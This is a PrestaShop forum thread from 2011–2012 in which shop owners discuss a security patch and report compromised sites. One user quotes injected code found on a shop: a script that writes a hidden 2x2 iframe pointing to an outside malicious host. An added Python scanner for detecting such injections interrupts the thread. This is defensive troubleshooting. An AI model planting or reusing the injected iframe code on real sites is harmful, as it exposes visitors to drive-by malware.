> Run the herphp.php fix, it patches the AdminHome.php file which had the bug that allows the Prestashop.com site to send files to your server.

I'll note that the AdminHome.php page isn't modified by herfix.php. Nor in the prestashop 1.4.4.1 update is the AdminHome.php file changed. The admin/ajax.php file *is* modified.

Prestashop devs followed up with me about this in email, writing:

> The AdminHome.php is updated only if you were in 1.4.0.17
> Between 1.4.4.0 and 1.4.4.1, only ajax.php needed to be updated.

-Jeff

crunch Posted August 31, 2011

Many thanks to the prestashop team for their efforts. That was the easiest and fastest fix for a compromised site I have ever done!

tatayoyo Posted September 2, 2011

Hi everyone! I've got this problem and try to fix it. I did all the process but the error message is the same, "hack attempt". When I test "herfix.php" on my local, that works and writes OK. What should I do to fix it? Thanks for your time! S.

jimmy15green Posted September 3, 2011

Up to what extent are these hackers harmful???

bedum Posted September 12, 2011

Hi, I am using V1.4.4.0 and I have followed all the 7 steps from this page: http://www.prestasho...rity_procedure/ All successful and OK. But my footer still shows the hacked message below.

"Module powered by Prestashop Modules - iLet"

I have checked my footer.tpl but there is no such word inside.. please help

Carl Favre Posted September 12, 2011

Hi bedum, Do you have some "strange" code in your footer.tpl?

mtanislav Posted September 20, 2011

Hello, is it only with my shop or do others have this problem too? After I applied the patch I started getting fake carts generated by crawlers. I get like 1000 carts generated every day. Does anybody else have this problem? I have prestashop v1.4.1

shacker Posted September 20, 2011

Check the code in the footer.tpl, and you can delete these test orders with my module delete connections (free)

hurray Posted September 28, 2011

Hi, I have two stores that use prestashop version 1.3.5.0 and 1.3.1.1. This week in a matter of 3 days, I received two emails from Google team, one for each store, about a possible phishing attack from my stores. I contacted my host and they believe it could be the security issue with prestashop. Apparently other prestashop owners have also been receiving the same email. Could this be due to the hack on prestashop website? You said it did not affect older versions but I wonder. Can anyone please post me a fix? Here's the email from Google. They point the problem with paypal/redirect.php file.

> Dear site owner or webmaster of savdana.com,
>
> We recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.
>
> Below are one or more example URLs on your site which may be part of a phishing attack:
>
> http://www.savdana .com/modules/paypal/redirect.php
>
> Here is a link to a sample warning page: http://www.google.com/interstitial?url=http%3A//www.savdana.com/modules/paypal/redirect.php
>
> We strongly encourage you to investigate this immediately to protect users who are being directed to a suspected phishing attack being hosted on your web site. Although some sites intentionally host such attacks, in many cases the webmaster is unaware because:
>
> 1) the site was compromised
> 2) the site doesn't monitor for malicious user-contributed content
>
> If your site was compromised, it's important to not only remove the content involved in the phishing attack, but to also identify and fix the vulnerability that enabled such content to be placed on your site. We suggest contacting your hosting provider if you are unsure of how to proceed.
>
> Once you've secured your site, and removed the content involved in the suspected phishing attack, or if you believe we have made an error and this is not actually a phishing attack, you can request that the warning be removed by visiting http://www.google.com/safebrowsing/report_error/?tpl=emailer and reporting an "incorrect forgery alert." We will review this request and take the appropriate actions.
>
> Sincerely,
> Google Search Quality Team

scfinder Posted November 29, 2011

Thank you for this topic, it helps me a lot.

Setu Posted January 12, 2012

Hi all, after I have applied the fix my site is broken. How can I fix it? This is what I get when I start my site:

    include(dirname(__FILE__).'/config/config.inc.php'); if(intval(Configuration::get('PS_REWRITING_SETTINGS')) === 1) $rewrited_url = __PS_BASE_URI__; include(dirname(__FILE__).'/header.php'); $smarty->assign('HOOK_HOME', Module::hookExec('home')); $smarty->display(_PS_THEME_DIR_.'index.tpl'); include(dirname(__FILE__).'/footer.php'); ?>

Can you help me?

akiralast Posted April 27, 2012

I am using prestashop v1.4.7.3, got hacked by sudan security team, can anybody help me?

reinoplantae Posted April 28, 2012

Well... in the herfix.php I don't see any mention of the version 1.4.6.2 (the one I'm using). So... won't this fix take effect in PS 1.4.6.2?? I've noticed that my ajax.php has not been modified.

jajajaja@ Posted July 18, 2012

Hello, we are lost in Spain, cannot find a solution. I found this code in versions of PrestaShop: 1.4.8.2-1.4.6 and 1.4.7

Mike Kranzler (Author) Posted July 18, 2012

This fix does not apply to versions of PrestaShop after v1.4.4.0, as it was fixed in all releases from 1.4.4.1 and on.

elitemfitness, what specific code did you find on your sites? And were these versions previously upgraded from earlier releases, or downloaded and installed in their current forms?

-Mike

jajajaja@ Posted July 18, 2012

> This fix does not apply to versions of PrestaShop after v1.4.4.0, as it was fixed in all releases from 1.4.4.1 and on. elitemfitness, what specific code did you find on your sites? And were these versions previously upgraded from earlier releases, or downloaded and installed in their current forms? -Mike

New installed. This is the wrong code:

    <!--c3284d--> <script type="text/javascript"> document.write('<iframe src="http://torvaldscallthat.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script><!--/c3284d-->

Edited July 18, 2012 by elitemfitness

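A way to search a shop's files for injected blocks shaped like the one quoted above (a script or iframe wrapped in matching hex-id comment markers, or an iframe only a couple of pixels in size). This is an added example, not code from the thread or from PrestaShop; the sample strings are constructed, with a placeholder host in place of the real one, and the 5-pixel threshold and the file-extension list are assumptions.

```python
import os
import re
import sys

# Paired comment markers sharing one short hex id: <!--c3284d--> ... <!--/c3284d-->
MARKER_BLOCK = re.compile(r'<!--([0-9a-f]{4,12})-->(.*?)<!--/\1-->', re.S | re.I)
IFRAME_TAG = re.compile(r'<iframe\b[^>]*>', re.I)
DIMENSION = re.compile(r'\b(width|height)\s*=\s*["\']?(\d+)', re.I)
SCAN_EXTENSIONS = (".tpl", ".php", ".html", ".htm", ".js")  # assumed file types

def tiny_iframes(text, max_px=5):
    """Return iframe tags whose width and height are both <= max_px."""
    hits = []
    for tag in IFRAME_TAG.findall(text):
        dims = {k.lower(): int(v) for k, v in DIMENSION.findall(tag)}
        if "width" in dims and "height" in dims and max(dims.values()) <= max_px:
            hits.append(tag)
    return hits

def scan_text(text):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    for m in MARKER_BLOCK.finditer(text):
        # Only report marker pairs that wrap active content.
        if re.search(r'<script\b|<iframe\b', m.group(2), re.I):
            findings.append(("marker-block", m.group(1)))
    for tag in tiny_iframes(text):
        findings.append(("tiny-iframe", tag))
    return findings

def scan_tree(root):
    """Walk root and return {relative_path: findings} for files with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read())
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report

# Constructed samples: same shape as the quoted block, placeholder host.
SAMPLE_INFECTED = (
    '<div id="footer">...</div>\n'
    '<!--c3284d--><script type="text/javascript">\n'
    "document.write('<iframe src=\"http://injected.example.invalid/x\" "
    "frameborder=\"no\" height=\"2\" width=\"2\"></iframe>');\n"
    '</script><!--/c3284d-->\n'
)
SAMPLE_CLEAN = (
    '<!-- footer -->\n'
    '<iframe src="https://video.example.invalid/embed/1" width="560" height="315">'
    '</iframe>\n'
)

if __name__ == "__main__":
    for rel_path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for kind, detail in found:
            print(f"{rel_path}: {kind}: {detail}")
```

Run it against a copy of the web root; every file it lists should be compared with a clean copy from the original release archive or a backup.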
nadie Posted July 18, 2012

> New installed. This is the wrong code

I think it is not prestashop problem, is the problem of security of your hosting.

Sorry for my English

jajajaja@ Posted July 18, 2012

> I think it is not prestashop problem, is the problem of security of your hosting. Sorry for my English

said to be hosting my hosting problem prestashop please prestashop many problems with this code in Spain we need professional help prestashop

Edited July 18, 2012 by elitemfitness

nadie Posted July 18, 2012

> said to be hosting my hosting problem prestashop please prestashop many problems with this code in Spain we need professional help prestashop

Check: http://wmaraci.com/f...rdim-44290.html (It's the same code, but with another manager called wordpress)

So I do not think is a problem of prestashop..

Sorry for my English

nadie Posted July 18, 2012

Well, let's hope that Mike says. (He will have more details)

Sorry for my English

jajajaja@ Posted July 18, 2012

nadie, I am Spanish. I am posting here because I want this to reach PrestaShop headquarters. I make my living from this and I have to get it solved one way or another. I appreciate your help on the Spanish forum. Regards.

nadie Posted July 18, 2012

> nadie, I am Spanish. I am posting here because I want this to reach PrestaShop headquarters. I make my living from this and I have to get it solved one way or another. I appreciate your help on the Spanish forum. Regards.

I can not give more indications of which you have been given here: http://www.prestasho...les-prestashop/

In Spanish: I cannot give you more details than the ones you have been given here: http://www.prestasho...les-prestashop/

Sorry for my English

Mike Kranzler (Author) Posted July 18, 2012

Hi elitemfitness,

I had our developers double-check it for me, and nadie is correct, that code has nothing to do with PrestaShop. This is an issue with your hosting provider. I would suggest that you change your database and FTP passwords, and then contact your host to resolve it.

-Mike

jajajaja@ Posted July 18, 2012

> Hi elitemfitness, I had our developers double-check it for me, and nadie is correct, that code has nothing to do with PrestaShop. This is an issue with your hosting provider. I would suggest that you change your database and FTP passwords, and then contact your host to resolve it. -Mike

hello nadie is our work is very highly regarded in Spain thank you very much for your help

Edited July 18, 2012 by elitemfitness